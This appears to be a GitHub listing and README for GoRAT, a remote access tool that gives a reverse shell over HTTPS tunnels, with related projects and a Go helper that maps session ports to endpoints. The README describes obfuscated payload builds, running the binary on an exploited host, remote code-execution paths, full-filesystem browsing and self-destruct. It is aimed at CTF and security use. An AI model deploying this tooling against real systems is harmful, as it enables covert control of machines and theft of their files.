
JustinTimperio / GoRAT

Licence: MIT license
GoRAT (Go Remote Access Tool) is an extremely powerful reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism.

Programming Languages: go, shell, Dockerfile

Projects that are alternatives of or similar to GoRAT

static-web-server
A blazing fast and asynchronous web server for static files-serving. ⚡
Stars: ✭ 230 (+576.47%)
Mutual labels:  freebsd, arm, file-server, x86, arm64
Keystone
Keystone assembler framework: Core (Arm, Arm64, Hexagon, Mips, PowerPC, Sparc, SystemZ & X86) + bindings
Stars: ✭ 1,654 (+4764.71%)
Mutual labels:  arm, mips, x86, arm64
Capstone
Capstone disassembly/disassembler framework: Core (Arm, Arm64, BPF, EVM, M68K, M680X, MOS65xx, Mips, PPC, RISCV, Sparc, SystemZ, TMS320C64x, Web Assembly, X86, X86_64, XCore) + bindings.
Stars: ✭ 5,374 (+15705.88%)
Mutual labels:  arm, mips, x86, arm64
Keypatch
Multi-architecture assembler for IDA Pro. Powered by Keystone Engine.
Stars: ✭ 939 (+2661.76%)
Mutual labels:  arm, mips, x86, arm64
Unicorn
Unicorn CPU emulator framework (ARM, AArch64, M68K, Mips, Sparc, PowerPC, RiscV, X86)
Stars: ✭ 4,934 (+14411.76%)
Mutual labels:  arm, mips, x86, arm64
Arm now
arm_now is a qemu powered tool that allows instant setup of virtual machines on arm cpu, mips, powerpc, nios2, x86 and more, for reverse, exploit, fuzzing and programming purpose.
Stars: ✭ 719 (+2014.71%)
Mutual labels:  arm, mips, x86
Bap
Binary Analysis Platform
Stars: ✭ 1,385 (+3973.53%)
Mutual labels:  arm, mips, x86
Cross
“Zero setup” cross compilation and “cross testing” of Rust crates
Stars: ✭ 2,461 (+7138.24%)
Mutual labels:  arm, mips, x86
asmdot
[Unstable] Fast, zero-copy and lightweight (Arm | Mips | x86) assembler in (C | C++ | C# | Go | Haskell | Javascript | Nim | OCaml | Python | Rust).
Stars: ✭ 23 (-32.35%)
Mutual labels:  arm, mips, x86
Steed
[INACTIVE] Rust's standard library, free of C dependencies, for Linux systems
Stars: ✭ 520 (+1429.41%)
Mutual labels:  arm, mips, x86
Mandibule
linux elf injector for x86 x86_64 arm arm64
Stars: ✭ 171 (+402.94%)
Mutual labels:  arm, x86, arm64
cross
“Zero setup” cross compilation and “cross testing” of Rust crates
Stars: ✭ 3,550 (+10341.18%)
Mutual labels:  arm, mips, x86
Rop Tool
A tool to help you write binary exploits
Stars: ✭ 590 (+1635.29%)
Mutual labels:  arm, mips, x86
alpine-php-fpm
Lightweight and optimised PHP-FPM (PHP 7.4, 8.0, 8.1) Docker images with essential extensions on top of latest Alpine Linux.
Stars: ✭ 53 (+55.88%)
Mutual labels:  arm, x86, arm64
Raspberrypipkg
DEPRECATED - DO NOT USE | Go here instead ->
Stars: ✭ 758 (+2129.41%)
Mutual labels:  freebsd, arm, arm64
Corehook
A library that simplifies intercepting application function calls using managed code and the .NET Core runtime
Stars: ✭ 191 (+461.76%)
Mutual labels:  arm, x86, arm64
Easy Linux Pwn
A set of Linux binary exploitation tasks for beginners on various architectures
Stars: ✭ 353 (+938.24%)
Mutual labels:  arm, mips, x86
toddler
Toddler is a well-designed usable and portable microkernel OS
Stars: ✭ 70 (+105.88%)
Mutual labels:  arm, mips, x86
Ataraxia
Simple and lightweight source-based multi-platform Linux distribution with musl libc.
Stars: ✭ 226 (+564.71%)
Mutual labels:  arm, mips, x86
Capstone.NET
.NET Core and .NET Framework binding for the Capstone Disassembly Framework
Stars: ✭ 108 (+217.65%)
Mutual labels:  arm, x86, arm64
 @@@@@@@@   @@@@@@   @@@@@@@    @@@@@@   @@@@@@@  
@@@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@@  @@@@@@@  
!@@        @@!  @@@  @@!  @@@  @@!  @@@    @@!    
!@!        !@!  @!@  !@!  @!@  !@!  @!@    !@!    
!@! @!@!@  @!@  !@!  @!@!!@!   @!@!@!@!    @!!    
!!! !!@!!  !@!  !!!  !!@!@!    !!!@!!!!    !!!    
:!!   !!:  !!:  !!!  !!: :!!   !!:  !!!    !!:    
:!:   !::  :!:  !:!  :!:  !:!  :!:  !:!    :!:    
 ::: ::::  ::::: ::  ::   :::  ::   :::     ::    
 :: :: :    : :  :    :   : :   :   : :     :     


GoRAT (Go Remote Access Tool) is an extremely powerful yet simple reverse shell, file server, and control plane using HTTPS reverse tunnels as a transport mechanism. (GoRAT is not anonymous and is designed for CTF players, Go enthusiasts, and security experts.)

Supported Distros:

64Bit Distros              | 32Bit Distros
---------------------------|------------------
Linux                      | Linux
FreeBSD                    | FreeBSD
OpenBSD                    | OpenBSD
Linux ARM                  | Linux ARM
FreeBSD ARM                | FreeBSD ARM
OpenBSD ARM                | OpenBSD ARM
Linux MIPS                 | Linux MIPS
MacOS (NOT BUILDING)       | MacOS
Android ARM (NOT BUILDING) | Android ARM
Windows (kinda)            | Windows (kinda)

Installing and Building Native

  1. Set up a full GoLang build environment
  2. Install UPX
  3. Install Garble with go get mvdan.cc/garble
  4. Fill out config.sh
  5. Run ./build_payload.sh --all

Installing and Building with Docker

  1. Install and start docker
  2. Fill out config.sh
  3. Run ./build_payload.sh --docker

Using the Payloads

  1. Transfer the BUILD folder to your "attacking" machine, install bc and run ./start_server.sh
  2. Exploit your system and run the binary
  3. Connect to the "target" via normal ssh from the "attacking" machine

Chisel Server Usage

GoRAT uses the standard release binaries provided by the chisel project. The server requires a number of configuration options and has fairly verbose logging, so a small shell script is provided that starts chisel and parses its output for easy use. To use it, run the following:

  1. cd server
  2. ./start_server.sh

As clients connect you will see a log like the one below. The port numbers in this log are how you reach each client's SSH server, HTTP file server, and HTTP control server.

mr.robot@localhost:~# ./start_server.sh 
Starting Chisel Server on Port 1337
=============================================
Session #1 | Control Server Mounted On: 27818
Session #1 | SSH Server Mounted On: 27819
=============================================
Session #2 | Control Server Mounted On: 33132
Session #2 | SSH Server Mounted On: 33133

Payload Usage

As with many Go binaries, the client executables require no configuration and simply need to be executed. In its current state GoRAT does not include any persistence mechanism, so if you want it to run as a service you will need to set that up by your own methods.

The payload also uses garble to produce a binary that works as well as a regular build, but has as little information about the original source code as possible.

SSH Server (Linux, FreeBSD, Darwin, OpenBSD)

Using the SSH port from the server log, you can connect to a client directly with the standard unix OpenSSH client:

ssh localhost -p ####

WSSH Windows (The Problem Child)

WARNING THE WINDOWS SHELL IS TERRIBLE, THIS WAS JUST AN EXPERIMENT

Please check out this thread: creack/pty#109 (comment)

When connecting to Windows hosts the ssh command above will not work, because GoRAT does not have a Windows PTY. For Windows systems, connect using the custom wrapper written for GoRAT (go build produces a binary named wssh, which is what you run):

cd wssh
go build wssh.go
./wssh

Control Server

The control server is a simple HTTP mechanism that maps a request path such as /some-page to an internal Go function, so requesting a web page results directly in the execution of code on the client system. While this mechanism is not very sophisticated, it is extremely reliable and performant. The API currently has the following commands:

  1. http://localhost:port/ - Returns a status code of OK if the host is online and responding to requests
  2. http://localhost:port/hardware - Reports a basic hardware survey of the device as JSON
  3. http://localhost:port/stop - Closes the client payload WITHOUT self-destruction
  4. http://localhost:port/uninstall - Terminates the client payload AND self-destructs

File Server

Each client's file server is reached on the same port as the control server; from a technical standpoint it is part of the control server. Files and directories can be accessed at http://localhost:####/fs/ through your browser or with tools like wget and curl.

[robot@localhost ~]$ curl localhost:14963/fs/
<pre>
<a href="bin">bin</a>
<a href="boot/">boot/</a>
<a href="dev/">dev/</a>
<a href="etc/">etc/</a>
<a href="home/">home/</a>
<a href="keybase/">keybase/</a>
<a href="lib">lib</a>
<a href="lib64">lib64</a>
<a href="lost+found/">lost+found/</a>
<a href="mnt/">mnt/</a>
<a href="opt/">opt/</a>
<a href="proc/">proc/</a>
<a href="root/">root/</a>
<a href="run/">run/</a>
<a href="sbin">sbin</a>
<a href="srv/">srv/</a>
<a href="sys/">sys/</a>
<a href="test/">test/</a>
<a href="tmp/">tmp/</a>
<a href="usr/">usr/</a>
<a href="var/">var/</a>
</pre>
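The Chisel Server Usage, Control Server and File Server sections above all hinge on the same thing: the per-session port numbers that start_server.sh prints. The following Go program is an added example, not code from the GoRAT project: it parses that log format (the excerpt from this README is embedded as the constructed sample), builds the documented endpoints (control path on the control port, /fs/ on the same port, ssh on the SSH port) for each session, and performs the "/" liveness check. The regular expression, the Session type, and the localhost binding are assumptions taken from the log and URL shapes shown in this README; the same parser is useful when reviewing a captured start_server.sh log after the fact.

```go
// Added example (not GoRAT project code): parse start_server.sh session lines
// into a session -> port map and derive the endpoints this README documents.
package main

import (
	"bufio"
	"context"
	"fmt"
	"net/http"
	"regexp"
	"strconv"
	"strings"
	"time"
)

// Session holds the two ports the chisel server assigns to one connected client.
type Session struct {
	ID          int
	ControlPort int // HTTP control plane; the /fs/ file server shares this port
	SSHPort     int // SSH server exposed through the reverse tunnel
}

// sessionLine matches e.g. "Session #1 | Control Server Mounted On: 27818"
// (assumed format, taken from the log excerpt in this README).
var sessionLine = regexp.MustCompile(`^Session #(\d+) \| (Control|SSH) Server Mounted On: (\d+)$`)

// ParseSessions reads start_server.sh output and returns sessions in order of
// first appearance. A session missing either port, or carrying an invalid
// port, is reported as an error rather than silently returned half-filled.
func ParseSessions(log string) ([]Session, error) {
	byID := map[int]*Session{}
	var order []int
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		m := sessionLine.FindStringSubmatch(strings.TrimSpace(sc.Text()))
		if m == nil {
			continue // prompt, banner and separator lines carry no port info
		}
		id, _ := strconv.Atoi(m[1])
		port, err := strconv.Atoi(m[3])
		if err != nil || port < 1 || port > 65535 {
			return nil, fmt.Errorf("session %d: bad port %q", id, m[3])
		}
		s, ok := byID[id]
		if !ok {
			s = &Session{ID: id}
			byID[id] = s
			order = append(order, id)
		}
		if m[2] == "Control" {
			s.ControlPort = port
		} else {
			s.SSHPort = port
		}
	}
	out := make([]Session, 0, len(order))
	for _, id := range order {
		s := byID[id]
		if s.ControlPort == 0 || s.SSHPort == 0 {
			return nil, fmt.Errorf("session %d: incomplete (control=%d ssh=%d)", id, s.ControlPort, s.SSHPort)
		}
		out = append(out, *s)
	}
	return out, nil
}

// ControlURL builds a control-server URL such as http://localhost:27818/hardware.
func (s Session) ControlURL(path string) string {
	return fmt.Sprintf("http://localhost:%d%s", s.ControlPort, path)
}

// FileURL builds a file-server URL; the README mounts it at /fs/ on the control port.
func (s Session) FileURL(rel string) string {
	return s.ControlURL("/fs/" + strings.TrimPrefix(rel, "/"))
}

// SSHCommand is the ssh invocation the README gives, with the port filled in.
func (s Session) SSHCommand() string {
	return fmt.Sprintf("ssh localhost -p %d", s.SSHPort)
}

// IsOnline performs the "/" liveness check: true only on a 200 response within timeout.
func IsOnline(base string, timeout time.Duration) bool {
	ctx, cancel := context.WithTimeout(context.Background(), timeout)
	defer cancel()
	req, err := http.NewRequestWithContext(ctx, http.MethodGet, base, nil)
	if err != nil {
		return false
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return false
	}
	defer resp.Body.Close()
	return resp.StatusCode == http.StatusOK
}

// sampleLog is a constructed input: the start_server.sh excerpt from this README.
const sampleLog = `mr.robot@localhost:~# ./start_server.sh 
Starting Chisel Server on Port 1337
=============================================
Session #1 | Control Server Mounted On: 27818
Session #1 | SSH Server Mounted On: 27819
=============================================
Session #2 | Control Server Mounted On: 33132
Session #2 | SSH Server Mounted On: 33133
`

func main() {
	sessions, err := ParseSessions(sampleLog)
	if err != nil {
		panic(err)
	}
	for _, s := range sessions {
		fmt.Printf("session %d: %s online=%v files=%s %s\n",
			s.ID, s.ControlURL("/"), IsOnline(s.ControlURL("/"), 2*time.Second), s.FileURL("etc/"), s.SSHCommand())
	}
}
```

Design note: the parser keys on the session number rather than on line order, so interleaved output from several clients connecting at once still yields one complete record per session, and a record that never received both ports is an error rather than a zero port that would later turn into a bogus URL.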

Architecture

GoRAT uses chisel and the gliderlabs ssh server to create a high-performance remote reverse tunnel over HTTPS. The diagram below shows how GoRAT establishes a link between multiple “targets” and a single “attacker”.

(architecture diagram)

Disclaimer

Use of GoRAT for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. We assume no liability and are not responsible for any misuse or damage caused by this software. Only use for educational purposes / ethical hacking. Multiple tools in this software include their own license.
